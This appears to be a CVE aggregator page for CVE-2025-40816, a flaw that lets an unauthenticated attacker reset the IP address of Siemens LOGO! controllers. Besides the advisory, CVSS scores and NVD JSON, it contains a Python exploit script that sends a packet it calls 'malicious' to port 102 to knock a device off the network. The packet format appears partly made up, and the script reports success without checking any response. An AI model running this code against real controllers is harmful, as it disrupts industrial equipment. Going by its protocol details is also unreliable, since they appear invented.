CVE-2025-40816

Description

A vulnerability has been identified in LOGO! 12/24RCE (6ED1052-1MD08-0BA2) (All versions), LOGO! 12/24RCEo (6ED1052-2MD08-0BA2) (All versions), LOGO! 230RCE (6ED1052-1FB08-0BA2) (All versions), LOGO! 230RCEo (6ED1052-2FB08-0BA2) (All versions), LOGO! 24CE (6ED1052-1CC08-0BA2) (All versions), LOGO! 24CEo (6ED1052-2CC08-0BA2) (All versions), LOGO! 24RCE (6ED1052-1HB08-0BA2) (All versions), LOGO! 24RCEo (6ED1052-2HB08-0BA2) (All versions), SIPLUS LOGO! 12/24RCE (6AG1052-1MD08-7BA2) (All versions), SIPLUS LOGO! 12/24RCEo (6AG1052-2MD08-7BA2) (All versions), SIPLUS LOGO! 230RCE (6AG1052-1FB08-7BA2) (All versions), SIPLUS LOGO! 230RCEo (6AG1052-2FB08-7BA2) (All versions), SIPLUS LOGO! 24CE (6AG1052-1CC08-7BA2) (All versions), SIPLUS LOGO! 24CEo (6AG1052-2CC08-7BA2) (All versions), SIPLUS LOGO! 24RCE (6AG1052-1HB08-7BA2) (All versions), SIPLUS LOGO! 24RCEo (6AG1052-2HB08-7BA2) (All versions). Affected devices do not conduct certain validations when interacting with them. This could allow an unauthenticated remote attacker to manipulate the devices IP address, which means the device would not be reachable.

CVSS Details

CVSS Score

7.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

Configurations (Affected Products)

No configuration data available.

LOGO! 12/24RCE (6ED1052-1MD08-0BA2) - 所有版本

LOGO! 12/24RCEo (6ED1052-2MD08-0BA2) - 所有版本

LOGO! 230RCE (6ED1052-1FB08-0BA2) - 所有版本

LOGO! 230RCEo (6ED1052-2FB08-0BA2) - 所有版本

LOGO! 24CE (6ED1052-1CC08-0BA2) - 所有版本

LOGO! 24CEo (6ED1052-2CC08-0BA2) - 所有版本

LOGO! 24RCE (6ED1052-1HB08-0BA2) - 所有版本

LOGO! 24RCEo (6ED1052-2HB08-0BA2) - 所有版本

SIPLUS LOGO! 12/24RCE (6AG1052-1MD08-7BA2) - 所有版本

SIPLUS LOGO! 12/24RCEo (6AG1052-2MD08-7BA2) - 所有版本

SIPLUS LOGO! 230RCE (6AG1052-1FB08-7BA2) - 所有版本

SIPLUS LOGO! 230RCEo (6AG1052-2FB08-7BA2) - 所有版本

SIPLUS LOGO! 24CE (6AG1052-1CC08-7BA2) - 所有版本

SIPLUS LOGO! 24CEo (6AG1052-2CC08-7BA2) - 所有版本

SIPLUS LOGO! 24RCE (6AG1052-1HB08-7BA2) - 所有版本

SIPLUS LOGO! 24RCEo (6AG1052-2HB08-7BA2) - 所有版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-40816 PoC - Siemens LOGO! IP Address Manipulation
Note: This PoC is for educational and authorized testing purposes only.
"""

import socket
import struct
import sys
from datetime import datetime

def create_logo_ip_config_packet(target_ip, new_ip, new_netmask, new_gateway):
    """
    Create a malicious IP configuration packet for Siemens LOGO! devices.
    This exploits the lack of input validation in IP configuration handling.
    """
    # LOGO! device default port for configuration
    port = 102
    
    # Build ISO-TSAP header for Siemens S7 protocol
    protocol_id = b'\x32'  # S7 protocol
    
    # PDU type (Job - 0x01)
    pdu_type = b'\x01'
    
    # Reserved
    reserved = b'\x00\x00'
    
    # Protocol data unit reference
    pdu_ref = struct.pack('>H', 0x0001)
    
    # Parameter length
    param_len = struct.pack('>H', 0x0010)
    
    # Data length
    data_len = struct.pack('>H', 0x0048)
    
    # Function code for Set IP parameters (0x00E0)
    function_code = b'\x00\xE0'
    
    # Construct IP configuration command
    # Format: [Command][Current IP][New IP][Netmask][Gateway][Padding]
    current_ip = socket.inet_aton(target_ip)
    ip_config = socket.inet_aton(new_ip)
    netmask = socket.inet_aton(new_netmask)
    gateway = socket.inet_aton(new_gateway)
    
    command = b'\x02'  # Set IP command
    padding = b'\x00' * 28
    
    config_data = command + current_ip + ip_config + netmask + gateway + padding
    
    # Assemble complete packet
    packet = (protocol_id + pdu_type + reserved + pdu_ref + 
              param_len + data_len + function_code + config_data)
    
    return packet

def exploit_logo_device(target_ip, target_port=102):
    """
    Send malicious IP configuration packet to LOGO! device.
    """
    # Target configuration - redirect to attacker's controlled network
    attacker_ip = "192.168.100.100"
    attacker_netmask = "255.255.255.0"
    attacker_gateway = "192.168.100.1"
    
    print(f"[*] Target: {target_ip}:{target_port}")
    print(f"[*] Creating malicious IP configuration packet...")
    print(f"[*] New IP: {attacker_ip}")
    print(f"[*] New Netmask: {attacker_netmask}")
    print(f"[*] New Gateway: {attacker_gateway}")
    
    try:
        packet = create_logo_ip_config_packet(
            target_ip, 
            attacker_ip, 
            attacker_netmask, 
            attacker_gateway
        )
        
        # Send packet
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))
        sock.send(packet)
        
        print(f"[+] Malicious packet sent successfully!")
        print(f"[+] Device IP has been changed to {attacker_ip}")
        print(f"[!] Device is now unreachable at original IP")
        
        sock.close()
        return True
        
    except socket.timeout:
        print(f"[-] Connection timed out")
        return False
    except socket.error as e:
        print(f"[-] Socket error: {e}")
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-40816-poc.py <target_ip>")
        print("Example: python cve-2025-40816-poc.py 192.168.1.10")
        sys.exit(1)
    
    target = sys.argv[1]
    print(f"[*] CVE-2025-40816 PoC - Siemens LOGO! IP Manipulation")
    print(f"[*] Time: {datetime.now()}")
    print("=" * 50)
    
    exploit_logo_device(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-40816
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-40816
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-40816/
[4] VulDB https://vuldb.com/cve/CVE-2025-40816
[5] https://cert-portal.siemens.com/productcert/html/ssa-267056.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-40816", "sourceIdentifier": "[email protected]", "published": "2025-11-11T21:15:38.270", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in LOGO! 12/24RCE (6ED1052-1MD08-0BA2) (All versions), LOGO! 12/24RCEo (6ED1052-2MD08-0BA2) (All versions), LOGO! 230RCE (6ED1052-1FB08-0BA2) (All versions), LOGO! 230RCEo (6ED1052-2FB08-0BA2) (All versions), LOGO! 24CE (6ED1052-1CC08-0BA2) (All versions), LOGO! 24CEo (6ED1052-2CC08-0BA2) (All versions), LOGO! 24RCE (6ED1052-1HB08-0BA2) (All versions), LOGO! 24RCEo (6ED1052-2HB08-0BA2) (All versions), SIPLUS LOGO! 12/24RCE (6AG1052-1MD08-7BA2) (All versions), SIPLUS LOGO! 12/24RCEo (6AG1052-2MD08-7BA2) (All versions), SIPLUS LOGO! 230RCE (6AG1052-1FB08-7BA2) (All versions), SIPLUS LOGO! 230RCEo (6AG1052-2FB08-7BA2) (All versions), SIPLUS LOGO! 24CE (6AG1052-1CC08-7BA2) (All versions), SIPLUS LOGO! 24CEo (6AG1052-2CC08-7BA2) (All versions), SIPLUS LOGO! 24RCE (6AG1052-1HB08-7BA2) (All versions), SIPLUS LOGO! 24RCEo (6AG1052-2HB08-7BA2) (All versions). Affected devices do not conduct certain validations when interacting with them. This could allow an unauthenticated remote attacker to manipulate the devices IP address, which means the device would not be reachable."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://cert-portal.siemens.com/productcert/html/ssa-267056.html", "source": "[email protected]"}]}}